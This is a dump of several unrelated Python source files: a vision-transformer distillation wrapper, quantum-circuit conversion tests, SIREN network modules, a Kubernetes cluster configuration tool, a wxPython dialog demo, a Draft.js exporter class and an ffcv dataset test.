trans_bboxes, labels = self.bbox_transform(
bboxes, labels, img_shape, scale_factor, flip)
# 保存原始图片shape
# resize后的图片shape
# 填充后的图片shape
# 缩放因子
# 是否翻转
img_meta_dict = dict({
'ori_shape': ori_shape,
'img_shape': img_shape,
'pad_shape': pad_shape,
'scale_factor': scale_factor,
'flip': flip
})
# 把img_meta_dict中的数据组成1维的array
img_meta = utils.compose_image_meta(img_meta_dict)
# 返回处理后的图片数据,图片相关的一些信息,图片中的标注框坐标,标注框标签
return img, img_meta, trans_bboxes, labels
# 获得所有类别的名称
def get_categories(self):
return self._classes
|
501839 | import tensorflow as tf
from tensorflow.keras import Model
from tensorflow.keras.layers import Layer
from tensorflow.keras import Sequential
import tensorflow.keras.layers as nn
from einops import rearrange, repeat
from vit import ViT
from t2t import T2TViT
from efficient import ViT as EfficientViT
def exists(val):
return val is not None
class DistillMixin:
def call(self, img, distill_token=None, training=True):
distilling = exists(distill_token)
x = self.patch_embedding(img)
b, n, d = x.shape
cls_tokens = repeat(self.cls_token, '() n d -> b n d', b=b)
x = tf.concat([cls_tokens, x], axis=1)
x += self.pos_embedding[:, :(n + 1)]
if distilling:
distill_tokens = repeat(distill_token, '() n d -> b n d', b = b)
x = tf.concat([x, distill_tokens], axis=1)
x = self._attend(x, training=training)
if distilling:
x, distill_tokens = x[:, :-1], x[:, -1]
if self.pool == 'mean':
x = tf.reduce_mean(x, axis=1)
else:
x = x[:, 0]
x = self.mlp_head(x)
if distilling:
return x, distill_tokens
else:
return x
class DistillableViT(DistillMixin, ViT):
def __init__(self, *args, **kwargs):
super(DistillableViT, self).__init__(*args, **kwargs)
self.args = args
self.kwargs = kwargs
self.dim = kwargs['dim']
self.num_classes = kwargs['num_classes']
def _attend(self, x, training=True):
x = self.dropout(x, training=training)
x = self.transformer(x, training=training)
return x
class DistillableT2TViT(DistillMixin, T2TViT):
def __init__(self, *args, **kwargs):
super(DistillableT2TViT, self).__init__(*args, **kwargs)
self.args = args
self.kwargs = kwargs
self.dim = kwargs['dim']
self.num_classes = kwargs['num_classes']
def _attend(self, x, training=True):
x = self.dropout(x, training=training)
x = self.transformer(x, training=training)
return x
class DistillableEfficientViT(DistillMixin, EfficientViT):
def __init__(self, *args, **kwargs):
super(DistillableEfficientViT, self).__init__(*args, **kwargs)
self.args = args
self.kwargs = kwargs
self.dim = kwargs['dim']
self.num_classes = kwargs['num_classes']
def _attend(self, x, training=True):
x = self.dropout(x, training=training)
x = self.transformer(x, training=training)
return x
class DistillWrapper(Model):
def __init__(self, teacher, student, temperature=1.0, alpha=0.5, hard=False):
super(DistillWrapper, self).__init__()
assert (isinstance(student, (DistillableViT, DistillableT2TViT, DistillableEfficientViT))), 'student must be a vision transformer'
self.teacher = teacher
self.student = student
dim = student.dim
num_classes = student.num_classes
self.temperature = temperature
self.alpha = alpha
self.hard = hard
self.distillation_token = tf.Variable(tf.random.normal([1, 1, dim]))
self.distill_mlp = Sequential([
nn.LayerNormalization(),
nn.Dense(units=num_classes)
], name='distill_mlp')
def call(self, inputs, temperature=None, alpha=None, training=True, **kwargs):
img, labels = inputs
b, *_ = img.shape
alpha = alpha if exists(alpha) else self.alpha
T = temperature if exists(temperature) else self.temperature
teacher_logits = tf.stop_gradient(self.teacher(img, training=training))
student_logits, distill_tokens = self.student(img, distill_token=self.distillation_token, training=training)
distill_logits = self.distill_mlp(distill_tokens)
loss = tf.keras.losses.categorical_crossentropy(y_true=labels, y_pred=student_logits, from_logits=True)
if not self.hard:
x = tf.nn.log_softmax(distill_logits / T, axis=-1)
y = tf.nn.softmax(teacher_logits / T, axis=-1)
distill_loss = tf.keras.losses.KLDivergence(reduction=tf.keras.losses.Reduction.NONE)(y_true=y, y_pred=x)
batch = distill_loss.shape[0]
distill_loss = tf.reduce_sum(distill_loss) / batch
distill_loss *= T ** 2
else:
teacher_labels = tf.argmax(teacher_logits, axis=-1)
            # teacher_labels are integer class indices, so the sparse variant is required here
            distill_loss = tf.keras.losses.sparse_categorical_crossentropy(y_true=teacher_labels, y_pred=distill_logits, from_logits=True)
return loss * (1 - alpha) + distill_loss * alpha
""" Usage
teacher = tf.keras.applications.resnet50.ResNet50()
v = DistillableViT(
image_size = 256,
patch_size = 32,
num_classes = 1000,
dim = 1024,
depth = 6,
heads = 8,
mlp_dim = 2048,
dropout = 0.1,
emb_dropout = 0.1
)
distiller = DistillWrapper(
student = v,
teacher = teacher,
temperature = 3, # temperature of distillation
alpha = 0.5, # trade between main loss and distillation loss
hard = False # whether to use soft or hard distillation
)
img = tf.random.normal([2, 256, 256, 3])
labels = tf.random.uniform(shape=[2, ], minval=0, maxval=1000, dtype=tf.int32)
labels = tf.one_hot(labels, depth=1000, axis=-1)
loss = distiller([img, labels])
"""
|
501841 | from tequila.circuit.pyzx import convert_to_pyzx, convert_from_pyzx
from tequila.circuit.gates import *
from tequila.simulators.simulator_api import simulate
from tequila import TequilaException
import numpy
import pytest
HAS_PYZX = True
try:
import pyzx
HAS_PYZX = True
except ImportError:
HAS_PYZX = False
@pytest.mark.skipif(not HAS_PYZX,
reason="Pyzx package not installed, test_convert_to_from_pyzx_simple not executed")
@pytest.mark.parametrize(
"tequila_circuit",
[
(X(target=3) + Y(target=2) + Z(target=1)),
(Rx(target=1, control=0, angle=5.67) + Ry(target=2, angle=0.98) + Rz(target=3, angle=1.67)),
(H(target=1) + H(target=1, control=0) + X(target=1) + Y(target=0) + Z(target=2) +
CX(target=3, control=0) + CY(target=4, control=2) + CZ(target=5, control=1) +
CNOT(target=3, control=0) + SWAP(first=0, second=3) +
S(target=1, control=0) + T(target=1, control=2))
]
)
def test_convert_to_from_pyzx_simple(tequila_circuit):
pyzx_circuit = convert_to_pyzx(tequila_circuit)
converted_circuit = convert_from_pyzx(pyzx_circuit)
wfn1 = simulate(tequila_circuit, backend="symbolic")
wfn2 = simulate(converted_circuit, backend="symbolic")
assert (numpy.isclose(wfn1.inner(wfn2), 1.0))
@pytest.mark.skipif(not HAS_PYZX,
reason="Pyzx package not installed, test_convert_to_from_pyzx not executed")
@pytest.mark.parametrize(
"variabs",
[
([2.8, 5.6, 7.6, 1.8, 4.98, 2.35, 3.12, 6.79, 0.12]),
([1.5, 3.7, 9.2, 3.1, 7.62, 1.98, 8.56, 2.97, 1.34]),
([0, 0, 0, 0, 0, 0, 0, 0, 0]),
([numpy.pi/12, numpy.pi, numpy.pi/3, numpy.pi/6, numpy.pi*0.95, numpy.pi/2, numpy.pi*2.3, numpy.pi/7, 0.56])
]
)
def test_convert_to_from_pyzx(variabs):
variables = {"ang1": variabs[0],
"ang2": variabs[1],
"ang3": variabs[2],
"ang4": variabs[3],
"ang5": variabs[4],
"ang6": variabs[5],
"ang7": variabs[6],
"ang8": variabs[7],
"ang9": variabs[8]}
tequila_circuit = H(target=[0, 1], control=2) + \
X(target=1) + \
Y(target=0) + \
Z(target=2) + \
CX(target=3, control=0) + \
CY(target=4, control=2) + \
CZ(target=5, control=1) + \
CNOT(target=3, control=0) + \
SWAP(first=0, second=3) + \
Rx(target=1, angle="ang1") + \
Ry(target=0, angle="ang2") + \
Rz(target=2, angle="ang3") + \
CRx(target=5, control=8, angle="ang4") + \
CRy(target=6, control=9, angle="ang5") + \
CRz(target=7, control=0, angle="ang6") + \
Phase(control=0, target=1, phi="ang7") + \
S(target=1, control=0) + \
T(target=1, control=2) + \
Rp(paulistring="Y(1)", angle="ang8") + \
ExpPauli(paulistring="Z(1)X(2)", control=0, angle="ang9") + \
Toffoli(target=2, first=4, second=3)
pyzx_circuit = convert_to_pyzx(tequila_circuit, variables=variables)
converted_circuit = convert_from_pyzx(pyzx_circuit)
wfn1 = simulate(tequila_circuit, backend="symbolic", variables=variables)
wfn2 = simulate(converted_circuit, backend="symbolic")
assert (numpy.isclose(wfn1.inner(wfn2), 1.0))
@pytest.mark.skipif(not HAS_PYZX,
reason="Pyzx package not installed, test_convert_to_from_pyzx_trotterized_gate not executed")
@pytest.mark.parametrize(
"string1,string2,angles,steps",
[
("1.0 X(1)Z(2) - 0.5 Z(3)X(4)", None, [numpy.pi/12], 1),
("1.0 X(1)Z(2) + 0.5 Z(3)X(4)", "1.0 Y(1)X(2) - 0.9 X(2)Z(3)", [5.6, numpy.pi], 1),
("1.5 Z(2)Z(4) + 0.8 Y(3)X(4)", None, [numpy.pi], 1)
]
)
def test_convert_to_from_pyzx_trotterized_gate(string1, string2, angles, steps):
variables = {"ang1": angles[0]} if string2 is None else {"ang1": angles[0], "ang2": angles[1]}
g1 = QubitHamiltonian.from_string(string1)
g2 = None if string2 is None else QubitHamiltonian.from_string(string2)
tequila_circuit = Trotterized(generators=[g1] if string2 is None else [g1, g2],
angles=["ang1"] if string2 is None else ["ang1", "ang2"],
steps=steps)
pyzx_circuit = convert_to_pyzx(tequila_circuit, variables=variables)
converted_circuit = convert_from_pyzx(pyzx_circuit)
wfn1 = simulate(tequila_circuit, backend="symbolic", variables=variables)
wfn2 = simulate(converted_circuit, backend="symbolic")
assert (numpy.isclose(wfn1.inner(wfn2), 1.0))
@pytest.mark.skipif(not HAS_PYZX,
reason="Pyzx package not installed, test_convert_from_pyzx_exception not executed")
def test_convert_from_pyzx_exception():
pyzx_circuit = pyzx.circuit.Circuit(qubit_amount=1)
tequila_circuit = QCircuit()
with pytest.raises(expected_exception=TequilaException,
match="Circuit provided must be of type pyzx.circuit.Circuit"):
convert_from_pyzx(tequila_circuit)
assert (isinstance(convert_from_pyzx(pyzx_circuit), QCircuit))
@pytest.mark.skipif(not HAS_PYZX,
reason="Pyzx package not installed, test_convert_to_from_pyzx_optimizing_circuit not executed")
@pytest.mark.parametrize(
"tequila_circuit,t_reduce",
[
(X(target=3) + Y(target=2) + Z(target=1), True),
(Rx(target=1, control=0, angle=5.67) + Ry(target=2, angle=0.98) + Rz(target=3, angle=1.67), False),
(H(target=1) + H(target=1, control=0) + X(target=1) + Y(target=0) + Z(target=2) +
CX(target=3, control=0) + CY(target=4, control=2) + CZ(target=5, control=1) +
CNOT(target=3, control=0) + SWAP(first=0, second=3) +
S(target=1, control=0) + T(target=1, control=2), True)
]
)
def test_convert_to_from_pyzx_optimizing_circuit(tequila_circuit, t_reduce):
pyzx_circuit = convert_to_pyzx(tequila_circuit)
pyzx_graph = pyzx_circuit.to_graph()
if t_reduce:
pyzx.teleport_reduce(pyzx_graph)
pyzx_circuit_opt = pyzx.Circuit.from_graph(pyzx_graph)
else:
pyzx.full_reduce(pyzx_graph)
pyzx_graph.normalize()
pyzx_circuit_opt = pyzx.extract_circuit(pyzx_graph.copy())
# compare_tensors returns True if pyzx_circuit and pyzx_circuit_opt
# implement the same circuit (up to global phase)
assert (pyzx.compare_tensors(pyzx_circuit, pyzx_circuit_opt))
# verify_equality return True if full_reduce() is able to reduce the
# composition of the circuits to the identity
assert (pyzx_circuit.verify_equality(pyzx_circuit_opt))
converted_circuit = convert_from_pyzx(pyzx_circuit_opt)
wfn1 = simulate(tequila_circuit, backend="symbolic")
wfn2 = simulate(converted_circuit, backend="symbolic")
assert (numpy.isclose(wfn1.inner(wfn2), 1.0))
|
501872 | from functools import partial
import numpy as np
import torch
import torch.nn as nn
# Taken from: https://github.dev/computational-imaging/ACORN/
class Sine(nn.Module):
def __init__(self, w0=30):
super().__init__()
self.w0 = w0
def forward(self, input):
return torch.sin(self.w0 * input)
def init_weights_zero(m):
if type(m) == nn.Linear:
if hasattr(m, 'weight'):
nn.init.zeros_(m.weight)
def init_weights_normal(m):
if type(m) == nn.Linear:
if hasattr(m, 'weight'):
nn.init.kaiming_normal_(m.weight, a=0.0, nonlinearity='relu', mode='fan_in')
def init_weights_xavier(m):
if type(m) == nn.Linear:
if hasattr(m, 'weight'):
nn.init.xavier_normal_(m.weight)
def sine_init(m, w0=30):
with torch.no_grad():
if hasattr(m, 'weight'):
num_input = m.weight.size(-1)
m.weight.uniform_(-np.sqrt(6 / num_input) / w0, np.sqrt(6 / num_input) / w0)
def first_layer_sine_init(m):
with torch.no_grad():
if hasattr(m, 'weight'):
num_input = m.weight.size(-1)
m.weight.uniform_(-1 / num_input, 1 / num_input)
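# sine_init follows the SIREN initialization (Sitzmann et al., 2020): weights are drawn
# from U(-sqrt(6 / fan_in) / w0, sqrt(6 / fan_in) / w0) so that pre-activations stay well
# scaled for sin(w0 * x); first_layer_sine_init uses the wider U(-1 / fan_in, 1 / fan_in)
# range for the input layer.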
class FCBlock(nn.Module):
'''A fully connected neural network that also allows swapping out the weights when used with a hypernetwork.
Can be used just as a normal neural network though, as well.
'''
def __init__(self, in_features, out_features, num_hidden_layers, hidden_features,
outermost_linear=True, nonlinearity='sine', weight_init=None, w0=30):
super().__init__()
self.first_layer_init = None
# Dictionary that maps nonlinearity name to the respective function, initialization, and, if applicable,
# special first-layer initialization scheme
nls_and_inits = {'sine': (Sine(w0=w0), partial(sine_init, w0=w0), first_layer_sine_init),
'relu': (nn.ReLU(inplace=True), init_weights_xavier, None)}
nl, nl_weight_init, first_layer_init = nls_and_inits[nonlinearity]
if weight_init is not None: # Overwrite weight init if passed
self.weight_init = weight_init
else:
self.weight_init = nl_weight_init
self.net = []
self.net.append(nn.Sequential(
nn.Linear(in_features, hidden_features), nl
))
for i in range(num_hidden_layers):
self.net.append(nn.Sequential(
nn.Linear(hidden_features, hidden_features), nl
))
if outermost_linear:
self.net.append(nn.Sequential(nn.Linear(hidden_features, out_features)))
else:
self.net.append(nn.Sequential(
nn.Linear(hidden_features, out_features), nl
))
self.net = nn.Sequential(*self.net)
if self.weight_init is not None:
self.net.apply(self.weight_init)
if first_layer_init is not None: # Apply special initialization to first layer, if applicable.
self.net[0].apply(first_layer_init)
def forward(self, rays):
B,C,N = rays.shape
rays = rays.permute(0,2,1) # B,N,C
rays = rays.reshape(B*N, C) # stack rays
output = self.net(rays)
output = output.reshape(B,N,1)
output = output.permute(0,2,1)
return output
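# Illustrative usage (a sketch, not part of the original module): FCBlock.forward expects
# rays of shape (B, C, N) and, because of the final reshape, assumes out_features == 1.
#   net = FCBlock(in_features=3, out_features=1, num_hidden_layers=3, hidden_features=256)
#   rays = torch.rand(2, 3, 1024)   # (batch, channels, num_rays)
#   out = net(rays)                 # -> shape (2, 1, 1024)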
class PositionalEncoding(nn.Module):
def __init__(self, num_encoding_functions=6, include_input=True, log_sampling=True, normalize=False,
input_dim=3, gaussian_pe=False, gaussian_variance=38):
super().__init__()
self.num_encoding_functions = num_encoding_functions
self.include_input = include_input
self.log_sampling = log_sampling
self.normalize = normalize
self.gaussian_pe = gaussian_pe
self.normalization = None
if self.gaussian_pe:
# this needs to be registered as a parameter so that it is saved in the model state dict
# and so that it is converted using .cuda(). Doesn't need to be trained though
self.gaussian_weights = nn.Parameter(gaussian_variance * torch.randn(num_encoding_functions, input_dim),
requires_grad=False)
else:
self.frequency_bands = None
if self.log_sampling:
self.frequency_bands = 2.0 ** torch.linspace(
0.0,
self.num_encoding_functions - 1,
self.num_encoding_functions)
else:
self.frequency_bands = torch.linspace(
2.0 ** 0.0,
2.0 ** (self.num_encoding_functions - 1),
self.num_encoding_functions)
if normalize:
self.normalization = torch.tensor(1/self.frequency_bands)
def forward(self, tensor) -> torch.Tensor:
r"""Apply positional encoding to the input.
Args:
tensor (torch.Tensor): Input tensor to be positionally encoded.
encoding_size (optional, int): Number of encoding functions used to compute
a positional encoding (default: 6).
include_input (optional, bool): Whether or not to include the input in the
positional encoding (default: True).
Returns:
(torch.Tensor): Positional encoding of the input tensor.
"""
encoding = [tensor] if self.include_input else []
if self.gaussian_pe:
for func in [torch.sin, torch.cos]:
encoding.append(func(torch.matmul(tensor, self.gaussian_weights.T)))
else:
for idx, freq in enumerate(self.frequency_bands):
for func in [torch.sin, torch.cos]:
if self.normalization is not None:
encoding.append(self.normalization[idx]*func(tensor * freq))
else:
encoding.append(func(tensor * freq))
# Special case, for no positional encoding
if len(encoding) == 1:
return encoding[0]
else:
return torch.cat(encoding, dim=1) # concat channels
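# Illustrative usage (a sketch, not part of the original module): with the default
# frequency-band encoding, include_input=True and num_encoding_functions=6, a 3-D input
# grows to 3 + 3 * 2 * 6 = 39 channels, concatenated along dim=1.
#   pe = PositionalEncoding(num_encoding_functions=6, include_input=True, input_dim=3)
#   pts = torch.rand(1024, 3)
#   enc = pe(pts)   # -> shape (1024, 39)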
class Conv2x(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size, stride=1, padding=1, deconv=False, concat=True, bn=True, relu=True):
super().__init__()
self.concat = concat
self.conv1 = BasicConv(in_channels, out_channels, deconv, bn=bn, relu=True, kernel_size=2,
stride=2, padding=0)
if self.concat:
self.conv2 = BasicConv(out_channels * 2, out_channels, False, bn,
relu, kernel_size=kernel_size, stride=stride, padding=padding)
else:
self.conv2 = BasicConv(out_channels, out_channels, False, bn,
relu, kernel_size=kernel_size, stride=stride, padding=padding)
def forward(self, x, rem):
x = self.conv1(x)
if x.size() != rem.size():
raise Exception("X size", x.size(), "!= rem size", rem.size())
if self.concat:
x = torch.cat((x, rem), 1)
else:
x = x + rem
x = self.conv2(x)
return x
class BasicConv(nn.Module):
def __init__(self, in_channels, out_channels, deconv=False, bn=True, relu=True, **kwargs):
super().__init__()
self.relu = relu
self.use_bn = bn
if deconv:
self.conv = nn.ConvTranspose2d(in_channels, out_channels, bias=False, **kwargs)
else:
self.conv = nn.Conv2d(in_channels, out_channels, bias=False, **kwargs)
self.bn = nn.BatchNorm2d(out_channels)
self.leaky_relu = nn.LeakyReLU(0.2, inplace=False)
def forward(self, x):
        x = self.conv(x)
        # Apply batch norm (when enabled) before the activation
        if self.use_bn:
            x = self.bn(x)
        if self.relu:
x = self.leaky_relu(x)
return x
|
501875 | from ipaddress import IPv4Address, IPv4Network
import jsonschema
import os
import subprocess
import yaml
import command
import resource
import template
import util
def get_project(create_dir_if_missing=False) -> str:
project_dir = os.getenv("HOMEWORLD_DIR")
if project_dir is None:
command.fail("no HOMEWORLD_DIR environment variable declared")
if not os.path.isdir(project_dir):
if create_dir_if_missing:
os.mkdir(project_dir)
else:
command.fail("HOMEWORLD_DIR (%s) is not a directory that exists" % project_dir)
return project_dir
def get_editor() -> str:
return os.getenv("EDITOR", "nano")
class Node:
VALID_NODE_KINDS = {"master", "worker", "supervisor"}
def __init__(self, config: dict, main_config: "Config"):
self.hostname = config["hostname"]
self.kind = config["kind"]
self.ip = IPv4Address(config["ip"])
self.main_config = main_config
if self.kind not in Node.VALID_NODE_KINDS:
raise Exception("invalid node kind: %s" % self.kind)
def __repr__(self):
return "%s node %s (%s)" % (self.kind, self.hostname, self.ip)
def external_dns_name(self):
return "%s.%s" % (self.hostname, self.main_config.external_domain)
SCHEMA = yaml.safe_load(resource.get("//spire/resources:setup-schema.yaml"))
class Config:
def __init__(self, kv: dict):
jsonschema.validate(kv, SCHEMA)
self.external_domain = kv["cluster"]["external-domain"]
self.internal_domain = kv["cluster"]["internal-domain"]
self.etcd_token = kv["cluster"]["etcd-token"]
self.realm = kv["cluster"]["kerberos-realm"]
self.mirror = kv["cluster"]["mirror"]
self.user_grant_domain = kv["cluster"]["user-grant-domain"]
self.user_grant_email_domain = kv["cluster"]["user-grant-email-domain"]
# the vlan on the trunk that each server needs to attach to in order to access the internet. "0" to represent
# that the server is either not on a vlan or that the VLAN is untrunked.
self.vlan = kv.get("vlan", 0)
self.cidr_nodes = IPv4Network(kv["addresses"]["cidr-nodes"])
self.cidr_pods = IPv4Network(kv["addresses"]["cidr-pods"])
self.cidr_services = IPv4Network(kv["addresses"]["cidr-services"])
self.service_api = IPv4Address(kv["addresses"]["service-api"])
self.service_dns = IPv4Address(kv["addresses"]["service-dns"])
if self.service_api not in self.cidr_services or self.service_dns not in self.cidr_services:
command.fail("in config: expected service IPs to be in the correct CIDR")
self.dns_upstreams = [IPv4Address(server) for server in kv["dns-upstreams"]]
self.dns_bootstrap = {hostname: IPv4Address(ip) for hostname, ip in kv["dns-bootstrap"].items()}
self.root_admins = kv["root-admins"]
self.nodes = [Node(n, self) for n in kv["nodes"]]
self.keyserver = None
for node in self.nodes:
if node.kind == "supervisor":
if self.keyserver is not None:
command.fail("in config: multiple supervisors not yet supported")
self.keyserver = node
# TODO(#371): make this configuration setting more explicit
def is_kerberos_enabled(self):
return len(self.root_admins) > 0
def has_node(self, node_name: str) -> bool:
return any(node.hostname == node_name for node in self.nodes)
def get_node(self, node_name: str) -> Node:
for node in self.nodes:
if node.hostname == node_name:
return node
command.fail("no such node: %s" % node_name)
def get_any_node(self, kind: str) -> Node:
for node in self.nodes:
if node.kind == kind:
return node
command.fail("cannot find any nodes of kind %s" % kind)
def get_fqdn(self, name: str) -> str:
hostname = name
if name.endswith("." + self.external_domain):
# strip external domain
hostname = name[:-(len(self.external_domain) + 1)]
elif name.endswith("." + self.internal_domain):
# strip internal domain
hostname = name[:-(len(self.internal_domain) + 1)]
if not self.has_node(hostname):
command.fail("no such node: %s" % name)
return hostname + "." + self.external_domain
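    # Illustrative behaviour (sketch): with external-domain "example.com" and
    # internal-domain "cluster.local", get_fqdn("node1"), get_fqdn("node1.cluster.local")
    # and get_fqdn("node1.example.com") all return "node1.example.com", provided "node1"
    # is a configured node.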
@classmethod
def load_from_string(cls, contents: bytes) -> "Config":
return Config(yaml.safe_load(contents))
@classmethod
def load_from_file(cls, filepath: str) -> "Config":
return Config.load_from_string(util.readfile(filepath))
@classmethod
def get_setup_path(cls) -> str:
return os.path.join(get_project(), "setup.yaml")
@classmethod
def load_from_project(cls) -> "Config":
return Config.load_from_file(Config.get_setup_path())
def get_config() -> Config:
return Config.load_from_project()
def get_keyserver_domain() -> str:
config = Config.load_from_project()
return config.keyserver.hostname + "." + config.external_domain
def get_etcd_endpoints() -> str:
nodes = Config.load_from_project().nodes
return ",".join("https://%s:2379" % n.ip for n in nodes if n.kind == "master")
def get_apiserver_default_as_node() -> Node:
# TODO: this should be eliminated, because nothing should be specific to this one apiserver
config = Config.load_from_project()
apiservers = [node for node in config.nodes if node.kind == "master"]
if not apiservers:
command.fail("no apiserver to select, because no master nodes were configured")
return apiservers[0]
def get_apiserver_default() -> str:
return "https://%s:443" % get_apiserver_default_as_node().ip
def get_cluster_conf() -> str:
config = Config.load_from_project()
apiservers = [node for node in config.nodes if node.kind == "master"]
cconf = {"APISERVER": get_apiserver_default(),
"APISERVER_COUNT": len(apiservers),
"CLUSTER_CIDR": config.cidr_pods,
"CLUSTER_DOMAIN": config.internal_domain,
"DOMAIN": config.external_domain,
"ETCD_CLUSTER": ",".join("%s=https://%s:2380" % (n.hostname, n.ip) for n in apiservers),
"ETCD_ENDPOINTS": get_etcd_endpoints(),
"ETCD_TOKEN": config.etcd_token,
"SERVICE_API": config.service_api,
"SERVICE_CIDR": config.cidr_services,
"SERVICE_DNS": config.service_dns}
output = ["# generated by spire from setup.yaml\n"]
output += ["%s=%s\n" % kv for kv in sorted(cconf.items())]
return "".join(output)
def get_kube_cert_paths() -> (str, str, str):
project_dir = get_project()
return os.path.join(project_dir, "kube-access.key"),\
os.path.join(project_dir, "kube-access.pem"),\
os.path.join(project_dir, "kube-ca.pem")
def get_local_kubeconfig() -> str:
key_path, cert_path, ca_path = get_kube_cert_paths()
kconf = {"APISERVER": get_apiserver_default(),
"AUTHORITY-PATH": ca_path,
"CERT-PATH": cert_path,
"KEY-PATH": key_path}
return template.template("//spire/resources:kubeconfig-local.yaml", kconf)
def get_prometheus_yaml() -> str:
config = Config.load_from_project()
kcli = {"APISERVER": get_apiserver_default_as_node().ip,
"NODE-TARGETS": "[%s]" % ",".join("'%s.%s:9100'" % (node.hostname, config.external_domain)
for node in config.nodes),
"PULL-TARGETS": "[%s]" % ",".join("'%s.%s:9103'" % (node.hostname, config.external_domain)
for node in config.nodes if node.kind != "supervisor"),
"ETCD-TARGETS": "[%s]" % ",".join("'%s.%s:9101'" % (node.hostname, config.external_domain)
for node in config.nodes if node.kind == "master")}
return template.template("//spire/resources:prometheus.yaml", kcli)
@command.wrap
def populate() -> None:
"initialize the cluster's setup.yaml with the template"
setup_yaml = os.path.join(get_project(create_dir_if_missing=True), "setup.yaml")
if os.path.exists(setup_yaml):
command.fail("setup.yaml already exists")
resource.extract("//spire/resources:setup.yaml", setup_yaml)
print("filled out setup.yaml")
@command.wrap
def edit() -> None:
"open $EDITOR (defaults to nano) to edit the project's setup.yaml"
setup_yaml = os.path.join(get_project(), "setup.yaml")
if not os.path.exists(setup_yaml):
command.fail("setup.yaml does not exist (run spire config populate first?)")
subprocess.check_call([get_editor(), "--", setup_yaml])
@command.wrap
def print_cluster_conf() -> None:
"display the generated cluster.conf"
print(get_cluster_conf())
@command.wrap
def print_local_kubeconfig() -> None:
"display the generated local kubeconfig"
print(get_local_kubeconfig())
@command.wrap
def print_prometheus_yaml() -> None:
"display the generated prometheus.yaml"
print(get_prometheus_yaml())
def get_kube_spec_vars(extra_kvs: dict=None) -> dict:
config = Config.load_from_project()
kvs = {
"INTERNAL_DOMAIN": config.internal_domain,
"NETWORK": config.cidr_pods,
"SERVIP_API": config.service_api,
"SERVIP_DNS": config.service_dns,
# TODO: stop allowing use of just a single apiserver
"SOME_APISERVER": [node for node in config.nodes if node.kind == "master"][0].ip,
}
if extra_kvs:
kvs.update(extra_kvs)
return kvs
def get_single_kube_spec(path: str, extra_kvs: dict=None) -> str:
templ = resource.get(path).decode()
return template.yaml_template(templ, get_kube_spec_vars(extra_kvs))
main_command = command.Mux("commands about cluster configuration", {
"populate": populate,
"edit": edit,
"show": command.Mux("commands about showing different aspects of the configuration", {
"cluster.conf": print_cluster_conf,
"kubeconfig": print_local_kubeconfig,
"prometheus.yaml": print_prometheus_yaml,
}),
})
|
501890 | import wx
def main():
    a = wx.App(False)
f = wx.Frame(None)
b = wx.Button(f, -1, 'showmodal')
f2 = wx.Dialog(f)
b2 = wx.Button(f2, -1, 'wut')
    def onsubbutton(e):
        print('IsModal ', f2.IsModal())
        print('IsShown ', f2.IsShown())
    b2.Bind(wx.EVT_BUTTON, onsubbutton)
    def onbutton(e):
        print('onbutton')
        print('showing modal')
        print('result:', f2.ShowModal())
        print('done!')
b.Bind(wx.EVT_BUTTON, onbutton)
f.Show()
a.MainLoop()
if __name__ == '__main__':
main() |
501893 | from typing import List, Optional, Sequence
from draftjs_exporter.command import Command
from draftjs_exporter.constants import ENTITY_TYPES
from draftjs_exporter.dom import DOM
from draftjs_exporter.error import ExporterException
from draftjs_exporter.options import Options, OptionsMap
from draftjs_exporter.types import (
Block,
Element,
EntityDetails,
EntityKey,
EntityMap,
)
class EntityException(ExporterException):
pass
class EntityState(object):
__slots__ = (
"entity_options",
"entity_map",
"entity_stack",
"completed_entity",
"element_stack",
)
def __init__(
self, entity_options: OptionsMap, entity_map: EntityMap
) -> None:
self.entity_options = entity_options
self.entity_map = entity_map
self.entity_stack: List[EntityKey] = []
self.completed_entity: Optional[EntityKey] = None
self.element_stack: List[Element] = []
def apply(self, command: Command) -> None:
if command.name == "start_entity":
self.entity_stack.append(command.data)
elif command.name == "stop_entity":
expected_entity = self.entity_stack[-1]
if command.data != expected_entity:
raise EntityException(
f"Expected {expected_entity}, got {command.data}"
)
self.completed_entity = self.entity_stack.pop()
def has_entity(self) -> List[EntityKey]:
return self.entity_stack
def has_no_entity(self) -> bool:
return not self.entity_stack
def get_entity_details(self, entity_key: EntityKey) -> EntityDetails:
details = self.entity_map.get(entity_key)
if details is None:
raise EntityException(
f'Entity "{entity_key}" does not exist in the entityMap'
)
return details
def render_entities(
self, style_node: Element, block: Block, blocks: Sequence[Block]
) -> Element:
# We have a complete (start, stop) entity to render.
if self.completed_entity is not None:
entity_details = self.get_entity_details(self.completed_entity)
options = Options.get(
self.entity_options,
entity_details["type"],
ENTITY_TYPES.FALLBACK,
)
props = entity_details["data"].copy()
props["entity"] = {
"type": entity_details["type"],
"mutability": entity_details["mutability"]
if "mutability" in entity_details
else None,
"block": block,
"blocks": blocks,
"entity_range": {"key": self.completed_entity},
}
if len(self.element_stack) == 1:
children = self.element_stack[0]
else:
children = DOM.create_element()
for n in self.element_stack:
DOM.append_child(children, n)
self.completed_entity = None
self.element_stack = []
# Is there still another entity? (adjacent) if so add the current style_node for it.
if self.has_entity():
self.element_stack.append(style_node)
return DOM.create_element(options.element, props, children)
if self.has_entity():
self.element_stack.append(style_node)
return None
return style_node
|
501948 | import string
from tempfile import NamedTemporaryFile
from assertpy import assert_that
import numpy as np
from torch.utils.data import Dataset
from ffcv import DatasetWriter
from ffcv.fields import IntField, JSONField
from ffcv.fields.bytes import BytesDecoder
from ffcv.fields.basics import IntDecoder
from ffcv import Loader
options = list(string.ascii_uppercase + string.digits)
def generate_random_string(low, high):
length = np.random.randint(low, high)
content = ''.join(np.random.choice(options, size=length))
return content
class DummyDictDataset(Dataset):
def __init__(self, n_samples):
self.n_samples = n_samples
def __len__(self):
return self.n_samples
def __getitem__(self, index):
if index >= self.n_samples:
raise IndexError()
np.random.seed(index)
length = np.random.randint(5, 250)
content = np.random.randint(0, 256, size=(length,))
json_content = {}
for i in range(3):
json_content[generate_random_string(5, 10)] = generate_random_string(50, 250)
return index, json_content
def run_test(n_samples):
with NamedTemporaryFile() as handle:
name = handle.name
dataset = DummyDictDataset(n_samples)
writer = DatasetWriter(name, {
'index': IntField(),
'activations': JSONField()
}, num_workers=3)
writer.from_indexed_dataset(dataset)
loader = Loader(name, batch_size=3, num_workers=5,
pipelines={
'activation': [BytesDecoder()],
'index': [IntDecoder()]
}
)
ix = 0
for _, json_encoded in loader:
json_docs = JSONField.unpack(json_encoded)
for doc in json_docs:
ref_doc = dataset[ix][1]
assert_that(sorted(doc.items())).is_equal_to(sorted(ref_doc.items()))
ix += 1
def test_simple_dict():
run_test(32)
|
501998 | from django.contrib import admin
from .models import Blacklist, MessageLog
